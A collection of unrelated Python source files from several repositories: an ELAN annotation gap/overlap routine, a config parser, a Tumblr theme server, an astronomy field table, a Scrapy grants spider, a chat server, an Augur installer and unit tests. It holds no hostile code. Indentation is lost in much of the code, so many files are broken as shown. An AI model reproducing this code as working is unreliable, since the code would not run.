| *Heldner, M., & Edlund, J. (2010). Pauses, gaps and overlaps in
conversations. Journal of Phonetics, 38(4), 555–568.
doi:10.1016/j.wocn.2010.08.002*
+-----+--------------------------------------------+
| id | Description |
+=====+============================================+
| O12 | Overlap from tier1 to tier2 |
+-----+--------------------------------------------+
| O21 | Overlap from tier2 to tier1 |
+-----+--------------------------------------------+
| G12 | Gap from tier1 to tier2 |
+-----+--------------------------------------------+
| G21 | Gap from tier2 to tier1 |
+-----+--------------------------------------------+
| P1 | Pause for tier1 |
+-----+--------------------------------------------+
| P2 | Pause for tier2 |
+-----+--------------------------------------------+
| B12 | Within speaker overlap from tier1 to tier2 |
+-----+--------------------------------------------+
| B21 | Within speaker overlap from tier2 to tier1 |
+-----+--------------------------------------------+
:param str tier1: Name of the first tier.
:param str tier2: Name of the second tier.
:param int maxlen: Maximum length of gaps (skip longer ones), if ``-1``
no maximum will be used.
:param bool progressbar: Flag for debugging purposes that shows the
progress during the process.
:returns: List of gaps and overlaps of the form:
``[(type, start, end)]``.
:raises KeyError: If a tier is non existent.
:raises IndexError: If no annotations are available in the tiers.
"""
spkr1anns = sorted((self.timeslots[a[0]], self.timeslots[a[1]])
for a in self.tiers[tier1][0].values())
spkr2anns = sorted((self.timeslots[a[0]], self.timeslots[a[1]])
for a in self.tiers[tier2][0].values())
line1 = []
        isin = lambda x, lst: any(i[0] <= x <= i[1] for i in lst)
minmax = (min(spkr1anns[0][0], spkr2anns[0][0]),
max(spkr1anns[-1][1], spkr2anns[-1][1]))
last = (1, minmax[0])
lastP = 0
for ts in xrange(*minmax):
in1, in2 = isin(ts, spkr1anns), isin(ts, spkr2anns)
if in1 and in2: # Both speaking
if last[0] == 'B':
continue
ty = 'B'
elif in1: # Only 1 speaking
if last[0] == '1':
continue
ty = '1'
elif in2: # Only 2 speaking
if last[0] == '2':
continue
ty = '2'
else: # None speaking
if last[0] == 'N':
continue
ty = 'N'
line1.append((last[0], last[1], ts))
last = (ty, ts)
if progressbar and int((ts*1.0/minmax[1])*100) > lastP:
lastP = int((ts*1.0/minmax[1])*100)
print '%d%%' % lastP
line1.append((last[0], last[1], minmax[1]))
ftos = []
for i in xrange(len(line1)):
if line1[i][0] == 'N':
if i != 0 and i < len(line1) - 1 and\
line1[i-1][0] != line1[i+1][0]:
ftos.append(('G12_%s_%s' % (tier1, tier2)
if line1[i-1][0] == '1' else 'G21_%s_%s' %
(tier2, tier1), line1[i][1], line1[i][2]))
else:
ftos.append(('P_%s' %
(tier1 if line1[i-1][0] == '1' else tier2),
line1[i][1], line1[i][2]))
elif line1[i][0] == 'B':
if i != 0 and i < len(line1) - 1 and\
line1[i-1][0] != line1[i+1][0]:
                    ftos.append(('O12_%s_%s' % (tier1, tier2)
                                 if line1[i-1][0] == '1' else 'O21_%s_%s' %
                                 (tier2, tier1), line1[i][1], line1[i][2]))
else:
ftos.append(('B_%s_%s' % ((tier1, tier2)
if line1[i-1][0] == '1' else
(tier2, tier1)), line1[i][1], line1[i][2]))
return [f for f in ftos if maxlen == -1 or abs(f[2] - f[1]) < maxlen]
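    # A minimal usage sketch (hypothetical tier names, not part of the
    # original file): total gap duration between two speakers.
    #
    #   ftos = eaf.get_gaps_and_overlaps_duration('speakerA', 'speakerB')
    #   gap_time = sum(end - begin for ty, begin, end in ftos
    #                  if ty.startswith('G'))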
def create_controlled_vocabulary(self, cv_id, descriptions, entries,
ext_ref=None):
"""Create a controlled vocabulary.
.. warning:: This is a very raw implementation and you should check the
Eaf file format specification for the entries.
:param str cv_id: Name of the controlled vocabulary.
:param list descriptions: List of descriptions.
:param dict entries: Entries dictionary.
:param str ext_ref: External reference.
"""
        self.controlled_vocabularies[cv_id] = (descriptions, entries, ext_ref)
def get_tier_ids_for_linguistic_type(self, ling_type, parent=None):
"""Give a list of all tiers matching a linguistic type.
:param str ling_type: Name of the linguistic type.
:param str parent: Only match tiers from this parent, when ``None``
this option will be ignored.
:returns: List of tiernames.
:raises KeyError: If a tier or linguistic type is non existent.
"""
return [t for t in self.tiers if
self.tiers[t][2]['LINGUISTIC_TYPE_REF'] == ling_type and
(parent is None or self.tiers[t][2]['PARENT_REF'] == parent)]
def remove_linguistic_type(self, ling_type):
"""Remove a linguistic type.
:param str ling_type: Name of the linguistic type.
"""
del(self.linguistic_types[ling_type])
def add_linguistic_type(self, lingtype, constraints=None,
timealignable=True, graphicreferences=False,
extref=None):
"""Add a linguistic type.
:param str lingtype: Name of the linguistic type.
:param list constraints: Constraint names.
:param bool timealignable: Flag for time alignable.
:param bool graphicreferences: Flag for graphic references.
:param str extref: External reference.
"""
self.linguistic_types[lingtype] = {
'LINGUISTIC_TYPE_ID': lingtype,
'TIME_ALIGNABLE': str(timealignable).lower(),
'GRAPHIC_REFERENCES': str(graphicreferences).lower(),
'CONSTRAINTS': constraints}
if extref is not None:
self.linguistic_types[lingtype]['EXT_REF'] = extref
def get_linguistic_types(self):
"""Give a list of available linguistic types.
:returns: List of linguistic type names.
"""
return self.linguistic_types.keys()
|
Stiliyan92/accounting-system
|
common/config_parser.py
|
import configparser
CONFIG_PATH = 'accounting.conf'
class MyConfigParser():
def __init__(self, config_path=CONFIG_PATH):
self.config = configparser.ConfigParser(allow_no_value=True)
self.config.read(config_path)
def config_section_map(self, section):
""" returns all configuration options in 'section' in a dict with
key: config_option and value: the read value in the file"""
dict1 = {}
options = self.config.options(section)
for option in options:
            try:
                dict1[option] = self.config.get(section, option)
                if dict1[option] == -1:
                    print("skip: %s" % option)
            except configparser.Error:
                dict1[option] = None
return dict1
# getint(section, option)
# getboolean(section, option)
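# A minimal usage sketch (assumes an accounting.conf next to the script with
# a [database] section; the section and option names are hypothetical):
#
#   parser = MyConfigParser()
#   db = parser.config_section_map('database')
#   print(db.get('host'))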
|
JHeimdal/HalIR
|
Test/plotf.py
|
#!/usr/bin/env python3
import sys
import numpy as np
from spc import SPC
import matplotlib.pyplot as plt
def plot(files, fac=1.0):
for f in files:
if f.split('.')[-1] == 'xy':
td = np.loadtxt(f)
plt.plot(td[:, 0], np.log(1. / td[:, 1]) * fac, label=f)
elif f.split('.')[-1] == 'spc':
td = SPC(f)
plt.plot(td.xdata, np.log(1. / np.array(td.ydata)), label=f)
plt.legend()
plt.show()
if __name__ == '__main__':
    if len(sys.argv) < 3:
        sys.exit('usage: plotf.py FACTOR FILE [FILE ...]')
    fac = float(sys.argv[1])
    files = sys.argv[2:]
    plot(files, fac)
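# Example invocation (hypothetical file names):
#   ./plotf.py 1.0 spectrum.xy reference.spc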
|
jeremyherbert/TumblrServ
|
tumblrserv.py
|
#!/usr/bin/env python
## tumblrserv.py implements a Tumblr (http://www.tumblr.com) markup parsing
## engine and compatible webserver.
##
## Version: 0.2 final
##
## Copyright (C) 2009 Jeremy Herbert
## Contact mailto:jeremy@jeremyherbert.net
##
## This program is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License
## as published by the Free Software Foundation; either version 2
## of the License, or (at your option) any later version.
##
## This program is distributed in the hope that it will be useful,
## but WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
## GNU General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with this program; if not, write to the Free Software
## Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
## 02110-1301, USA.
import os, sys, ftplib, yaml, cherrypy, re, urllib2
from src.post_classes import *
from src import json
from src.constants import *
from src.support import *
from src.net import *
from src.server import *
post_types = ['Regular', 'Photo', 'Quote', 'Link', 'Conversation', 'Video', 'Audio']
args_dict = {
'autoreload': 0, # Whether to add the meta refresh tag
'publish': False, # Whether to push the new theme data to tumblr
'data_source': DATA_LOCAL, # Whether to use local data in the theme
}
########################################
# take the arguments and place them in a mutable list
arguments = sys.argv
# if the script has been run with the interpreter prefix, get rid of it
if arguments[0] == 'python' or arguments[0] == 'ipython' \
or arguments[0] == 'python2.5':
arguments.pop(0)
# pop off the script name
arguments.pop(0)
# load the configuration file
config_path = 'data/config.yml'
if contains(arguments, '--config'):
if os.path.exists(next_arg(arguments, '--config')):
config_path = next_arg(arguments, '--config')
config = get_config(config_path)
# now we check if there are any data processing flags
if contains(arguments, '--pull-data'):
# call pull_data with the argument after the flag
pull_data( next_arg(arguments, '--pull-data') )
if contains(arguments, '--theme'):
if not os.path.exists("themes/" + next_arg(arguments, '--theme') + '.thtml'):
err_exit("The theme file %s.thtml does not exist in the themes\
directory." % next_arg(arguments, '--theme'))
config['defaults']['theme_name'] = next_arg(arguments, '--theme')
if contains(arguments, '--publish'):
if not has_keys(config['publishing_info'], \
( 'url', 'username', 'password' )):
err_exit('The configuration file is missing some critical publishing\
information. Please make sure you have specified your url, username and\
password.')
publish_theme(config['publishing_info']['url'],\
config['publishing_info']['username'],\
config['publishing_info']['password'],\
get_markup('themes/%s.thtml' % config['defaults']['theme_name']))
if contains(arguments, '--do-nothing'):
config['optimisations']['do_nothing'] = True
# start the server up
cherrypy.config.update('data/cherrypy.conf')
cherrypy.quickstart(TumblrServ(config), '/')
|
ytsapras/robonet_site
|
scripts/rome_fields_dict.py
|
field_dict={'ROME-FIELD-01':[ 267.835895375 , -30.0608178195 , '17:51:20.6149','-30:03:38.9442' ],
'ROME-FIELD-02':[ 269.636745458 , -27.9782661111 , '17:58:32.8189','-27:58:41.758' ],
'ROME-FIELD-03':[ 268.000049542 , -28.8195573333 , '17:52:00.0119','-28:49:10.4064' ],
'ROME-FIELD-04':[ 268.180171708 , -29.27851275 , '17:52:43.2412','-29:16:42.6459' ],
'ROME-FIELD-05':[ 268.35435 , -30.2578356389 , '17:53:25.044','-30:15:28.2083' ],
'ROME-FIELD-06':[ 268.356124833 , -29.7729819283 , '17:53:25.47','-29:46:22.7349' ],
'ROME-FIELD-07':[ 268.529571333 , -28.6937071111 , '17:54:07.0971','-28:41:37.3456' ],
'ROME-FIELD-08':[ 268.709737083 , -29.1867251944 , '17:54:50.3369','-29:11:12.2107' ],
'ROME-FIELD-09':[ 268.881108542 , -29.7704673333 , '17:55:31.4661','-29:46:13.6824' ],
'ROME-FIELD-10':[ 269.048498333 , -28.6440675 , '17:56:11.6396','-28:38:38.643' ],
'ROME-FIELD-11':[ 269.23883225 , -29.2716684211 , '17:56:57.3197','-29:16:18.0063' ],
'ROME-FIELD-12':[ 269.39478875 , -30.0992361667 , '17:57:34.7493','-30:05:57.2502' ],
'ROME-FIELD-13':[ 269.563719375 , -28.4422328996 , '17:58:15.2927','-28:26:32.0384' ],
'ROME-FIELD-14':[ 269.758843 , -29.1796030365 , '17:59:02.1223','-29:10:46.5709' ],
'ROME-FIELD-15':[ 269.78359875 , -29.63940425 , '17:59:08.0637','-29:38:21.8553' ],
'ROME-FIELD-16':[ 270.074981708 , -28.5375585833 , '18:00:17.9956','-28:32:15.2109' ],
'ROME-FIELD-17':[ 270.81 , -28.0978333333 , '18:03:14.4','-28:05:52.2' ],
'ROME-FIELD-18':[ 270.290886667 , -27.9986032778 , '18:01:09.8128','-27:59:54.9718' ],
'ROME-FIELD-19':[ 270.312763708 , -29.0084241944 , '18:01:15.0633','-29:00:30.3271' ],
'ROME-FIELD-20':[ 270.83674125 , -28.8431573889 , '18:03:20.8179','-28:50:35.3666' ]}
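# A minimal usage sketch (not part of the original file): print every field
# centre in both sexagesimal and decimal degrees.
if __name__ == '__main__':
    for name in sorted(field_dict):
        ra_deg, dec_deg, ra_str, dec_str = field_dict[name]
        print('%s  %s %s  (%.5f, %.5f)' % (name, ra_str, dec_str, ra_deg, dec_deg))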
|
poderomedia/kfdata
|
kgrants/spiders/grants.py
|
# -*- coding: utf-8 -*-
from scrapy.spider import Spider
from scrapy.selector import Selector
from kgrants.items import KgrantsItem
from scrapy.http import Request
import time
class GrantsSpider(Spider):
name = "grants"
allowed_domains = ["www.knightfoundation.org"]
pages = 1
base_url = 'http://www.knightfoundation.org'
start_url_str = 'http://www.knightfoundation.org/grants/?sort=title&page=%s'
def __init__(self, pages=None, *args, **kwargs):
super(GrantsSpider, self).__init__(*args, **kwargs)
if pages is not None:
self.pages = pages
self.start_urls = [ self.start_url_str % str(page) for page in xrange(1,int(self.pages)+1)]
def parse(self, response):
hxs = Selector(response)
projects = hxs.xpath('//article')
for project in projects:
time.sleep(2)
project_url = self.base_url + ''.join(project.xpath('a/@href').extract())
grants = KgrantsItem()
grants['page'] = project_url
grants['project'] = ''.join(project.xpath('a/div/header/h1/text()').extract()).strip()
grants['description'] = ''.join(project.xpath('p/text()').extract()).strip()
yield Request(grants['page'],
callback = self.parse_project,
meta={'grants':grants})
def parse_project(self,response):
hxs = Selector(response)
grants = response.meta['grants']
details = hxs.xpath('//section[@id="grant_info"]')
fields = hxs.xpath('//dt')
values = hxs.xpath('//dd')
self.log('field: <%s>' % fields.extract())
for item in details:
grants['fiscal_agent'] = ''.join(item.xpath('header/h2/text()').extract()).strip()
count = 0
for field in fields:
normalized_field = ''.join(field.xpath('text()').extract()).strip().lower().replace(' ','_')
self.log('field: <%s>' % normalized_field)
            try:
                grants[normalized_field] = values.xpath('text()').extract()[count]
            except (IndexError, KeyError):
                if normalized_field == 'community':
                    grants[normalized_field] = values.xpath('a/text()').extract()[1]
                elif normalized_field == 'focus_area':
                    grants[normalized_field] = values.xpath('a/text()').extract()[0]
count += 1
grants['grantee_contact_email'] = ''.join(
item.xpath('section[@id="grant_contact"]/ul/li[@class="email"]/a/@href').extract()).replace('mailto:','').strip()
grants['grantee_contact_name'] = ''.join(
item.xpath('section[@id="grant_contact"]/ul/li[@class="email"]/a/text()').extract()).strip()
grants['grantee_contact_location'] = ''.join(
item.xpath('section[@id="grant_contact"]/ul/li[@class="location"]/text()').extract()).strip()
grants['grantee_contact_facebook'] = ''.join(
item.xpath('section[@id="grant_contact"]/ul/li[@class="facebook"]/a/@href').extract()).strip()
grants['grantee_contact_twitter'] = item.xpath('section[@id="grant_contact"]/ul/li[@class="twitter"]/a/@href').extract()
grants['grantee_contact_website'] = item.xpath('section[@id="grant_contact"]/ul/li[@class="website"]/a/@href').extract()
if 'grant_period' in grants:
grant_period = grants['grant_period'].split(' to ')
grants['grant_period_start'] = grant_period[0]
grants['grant_period_end'] = grant_period[1]
yield grants
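# A typical run (assumption based on standard Scrapy usage; 'pages' is the
# spider argument consumed in __init__ above):
#
#   scrapy crawl grants -a pages=3 -o grants.json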
|
maxiee/LearnPythonTheHardWayExercises
|
ex20.py
|
from sys import argv
script, input_file = argv
def print_all(f):
print f.read()
def rewind(f):
f.seek(0)
def print_a_line(line_count, f):
print line_count, f.readline()
current_file = open(input_file)
print "First let's print the whole file:\n"
print_all(current_file)
print "Now let's rewind, kind of like a tape."
rewind(current_file)
print "Let's print three lines:"
current_line = 1
print_a_line(current_line, current_file)
current_line = current_line + 1
print_a_line(current_line, current_file)
current_line = current_line + 1
print_a_line(current_line, current_file)
|
kodi-czsk/plugin.video.hejbejse.tv
|
resources/lib/hejbejse.py
|
# -*- coding: UTF-8 -*-
#/*
# * Copyright (C) 2011 Ivo Brhel
# *
# *
# * This Program is free software; you can redistribute it and/or modify
# * it under the terms of the GNU General Public License as published by
# * the Free Software Foundation; either version 2, or (at your option)
# * any later version.
# *
# * This Program is distributed in the hope that it will be useful,
# * but WITHOUT ANY WARRANTY; without even the implied warranty of
# * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# * GNU General Public License for more details.
# *
# * You should have received a copy of the GNU General Public License
# * along with this program; see the file COPYING. If not, write to
# * the Free Software Foundation, 675 Mass Ave, Cambridge, MA 02139, USA.
# * http://www.gnu.org/copyleft/gpl.html
# *
# */
import re,os,urllib,urllib2,cookielib
import util,resolver
from provider import ContentProvider
class HejbejseContentProvider(ContentProvider):
def __init__(self,username=None,password=None,filter=None):
ContentProvider.__init__(self,'hejbejse.tv','http://www.kynychova-tv.cz/',username,password,filter)
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.LWPCookieJar()))
urllib2.install_opener(opener)
def capabilities(self):
return ['resolve','categories','list']
def categories(self):
page = util.parse_html('http://www.kynychova-tv.cz/index.php?id=5')
result = []
for title,uri in [(x.h3.text,x.h3.a['href']) for x in page.select('div.entry5') if x.h3]:
item = self.dir_item()
item['title'] = title
item['url'] = uri
result.append(item)
return result
def list(self, url):
url = self._url(url)
page = util.parse_html(url)
result = []
for title,uri in [(x.img['title'],x['href']) for x in page.select('div.entry3')[0].findAll('a')]:
item = self.video_item()
item['title'] = title
item['url'] = uri
result.append(item)
return result
def resolve(self,item,captcha_cb=None,select_cb=None):
item = item.copy()
url = self._url(item['url'])
page = util.parse_html(url)
result = []
data=str(page.select('div.entry3 > center')[0])
resolved = resolver.findstreams(data,['<iframe(.+?)src=[\"\'](?P<url>.+?)[\'\"]'])
try:
for i in resolved:
item = self.video_item()
item['title'] = i['name']
item['url'] = i['url']
item['quality'] = i['quality']
item['surl'] = i['surl']
result.append(item)
except:
print '===Unknown resolver==='
if len(result)==1:
return result[0]
elif len(result) > 1 and select_cb:
return select_cb(result)
|
lovekun/Notebook
|
python/chatroomServer.py
|
import socket
import threading
import time
def tcplink(sock, addr):
print 'Accept new connection from %s:%s...' % addr
sock.send('Welcome!')
while True:
data = sock.recv(1024)
time.sleep(1)
if data == 'exit' or not data:
break
sock.send('Hello, %s!' % data)
sock.close()
print 'Connection from %s:%s closed.' % addr
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('127.0.0.1', 8888))
s.listen(5)
print 'Waiting for connection...'
while True:
sock, addr = s.accept()
t = threading.Thread(target=tcplink, args=(sock, addr))
t.start()
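# A minimal client sketch for manual testing (not part of the original file);
# run it in a second terminal while the server is listening:
#
#   import socket
#   c = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#   c.connect(('127.0.0.1', 8888))
#   print c.recv(1024)   # 'Welcome!'
#   c.send('Alice')
#   print c.recv(1024)   # 'Hello, Alice!'
#   c.send('exit')
#   c.close()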
|
AugurProject/augur-launcher
|
Augur Installer.py
|
import os
import sys
import shutil
import binascii
import traceback
import subprocess
from win32com.client import Dispatch
LAUNCHER_PATH = "C:\\Program Files\\Augur"
DATA_PATH = os.path.join(os.path.expanduser('~'), 'AppData', 'Roaming', "Augur")
PASSFILE = os.path.join(DATA_PATH, "password.txt")
if getattr(sys, 'frozen', False):
# we are running in a |PyInstaller| bundle
BASEDIR = sys._MEIPASS
else:
# we are running in a normal Python environment
BASEDIR = os.path.dirname(os.path.abspath(__file__))
GETH_EXE = os.path.join(BASEDIR, 'geth.exe')
LAUNCHER_EXE = os.path.join(BASEDIR, 'augurlauncher.exe')
def main():
# first make all the appropriate directories
print("Making directories...")
for d in LAUNCHER_PATH, DATA_PATH:
print("Creating", d, end=" ", flush=True)
os.mkdir(d)
print("Success!")
print("Generating random password file...", end=" ", flush=True)
# then generate the password
password = binascii.b2a_hex(os.urandom(32))
passfile = open(PASSFILE, "w")
passfile.write(password.decode('ascii'))
passfile.close()
print("Success!")
# Then copy ".exe"s to the launcher path
exes = GETH_EXE, LAUNCHER_EXE
results = []
for exe in exes:
print("Copying", os.path.basename(exe), "to", LAUNCHER_PATH, "...", end=" ", flush=True)
results.append(shutil.copy(exe, LAUNCHER_PATH))
print("Sucess!")
print("Creating node account...", end=" ", flush=True)
# create account on node
p = subprocess.Popen([results[0],
"--password", PASSFILE,
"account", "new"])
p.wait()
print("Success!")
print("Creating shortcut...", end=" ", flush=True)
desktop = os.path.join(os.path.expanduser('~'), 'Desktop')
shortcut_path = os.path.join(desktop, "Augur Launcher.lnk")
wDir = LAUNCHER_PATH
shell = Dispatch('WScript.Shell')
shortcut = shell.CreateShortCut(shortcut_path)
shortcut.Targetpath = results[1]
shortcut.WorkingDirectory = wDir
shortcut.IconLocation = results[1]
shortcut.save()
print("Success!")
def uninstall():
paths = LAUNCHER_PATH, DATA_PATH
for p in paths:
print("Deleting", p, "...", end=" ", flush=True)
shutil.rmtree(p)
print("Success!")
print("Removing desktop shortcut...", end=" ", flush=True)
desktop = os.path.join(os.path.expanduser('~'), 'Desktop')
shortcut_path = os.path.join(desktop, "Augur Launcher.lnk")
os.remove(shortcut_path)
print("Success!")
if __name__ == '__main__':
try:
if len(sys.argv) == 2 and sys.argv[1] == 'uninstall':
uninstall()
elif len(sys.argv) == 1:
main()
        else:
            raise ValueError("wrong number of arguments!")
except Exception as exc:
traceback.print_exc()
finally:
os.system("pause")
sys.exit(0)
|
ancho85/pylint-playero-plugin
|
tests/test_funcs.py
|
import unittest
from libs.funcs import *
class TestFuncs(unittest.TestCase):
def test_buildPaths(self):
recPaths, repPaths, rouPaths, corePaths = buildPaths()
findTxt = lambda x, y: x.find(y) > -1
assert findTxt(recPaths["Task"][0], "base")
assert findTxt(recPaths["Department"][0], "StdPy")
assert findTxt(recPaths["Department"][1], "standard")
assert findTxt(repPaths["ListWindowReport"][0], "base")
assert findTxt(repPaths["ExpensesList"][0], "StdPy")
assert findTxt(repPaths["ExpensesList"][1], "standard")
assert findTxt(rouPaths["GenNLT"][0], "StdPy")
assert findTxt(rouPaths["GenNLT"][1], "standard")
assert findTxt(corePaths["Field"][0], "embedded")
self.assertFalse([k for (k, v) in rouPaths.iteritems() if findTxt(v[0], "base")]) #no routines in base
def test_recordInheritance(self):
recf, recd = getRecordInheritance("Invoice")
assert all([f1 in recf for f1 in ("SalesMan", "InvoiceDate", "CustCode", "Currency", "ShiftDate", "OriginNr", "SerNr", "attachFlag")])
assert all([d in recd for d in ("CompoundItemCosts", "Payments", "Items", "Taxes", "Installs")])
recf, recd = getRecordInheritance("AccessGroup")
assert all([f2 in recf for f2 in ("PurchaseItemsAccessType", "InitialModule", "Closed", "internalId")])
assert all([d in recd for d in ("PurchaseItems", "Customs", "Modules")])
def test_recordsInfo(self):
recf, recd = getRecordsInfo("Department", RECORD)
assert recf["Department"]["AutoCashCancel"] == "integer" #From StdPy
assert recf["Department"]["DeptName"] == "string" #From standard
assert recf["Department"]["Closed"] == "Boolean" #From Master
assert recf["Department"]["internalId"] == "internalid" #From Record
assert recd["Department"]["OfficePayModes"] == "DepartmentOfficePayModeRow" #Recordname from detail
repf, repd = getRecordsInfo("Balance", REPORT)
assert repf["Balance"]["LabelType"] == "string" #StdPy
assert repf["Balance"]["ExplodeByLabel"] == "boolean" #Standard
assert repf["Balance"]["internalId"] == "internalid" #Record
assert not repd["Balance"] #Empty dict, no detail
rouf, roud = getRecordsInfo("GenNLT", ROUTINE)
assert rouf["GenNLT"]["ExcludeInvalid"] == "boolean"
assert rouf["GenNLT"]["Table"] == "string"
assert not roud["GenNLT"]
rouf, roud = getRecordsInfo("LoginDialog", RECORD)
assert rouf["LoginDialog"]["Password"] == "string" #embedded
assert not roud["LoginDialog"]
def test_classInfo(self):
attr, meth = getClassInfo("Invoice")
assert attr["DEBITNOTE"] == 2
assert attr["ATTACH_NOTE"] == 3
assert attr["rowNr"] == 0
assert attr["ParentInvoice"] == "SuperClass"
assert isinstance(attr["DocTypes"], list)
assert isinstance(attr["Origin"], dict)
assert all([m in meth for m in ("getCardReader", "logTransactionAction", "updateCredLimit",
"generateTaxes", "roundValue", "getOriginType", "bring", "getXML", "createField")])
assert meth["fieldIsEditable"][0] == "self"
assert meth["fieldIsEditable"][1] == "fieldname"
assert meth["fieldIsEditable"][2] == {"rowfieldname":'None'}
assert meth["fieldIsEditable"][3] == {"rownr":'None'}
attr, meth = getClassInfo("User")
assert attr["buffer"] == "RecordBuffer"
assert all([m in meth for m in ("store", "save", "load", "hasField")])
def test_suite():
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(TestFuncs))
return suite
if __name__ == '__main__':
unittest.main(defaultTest='test_suite')
|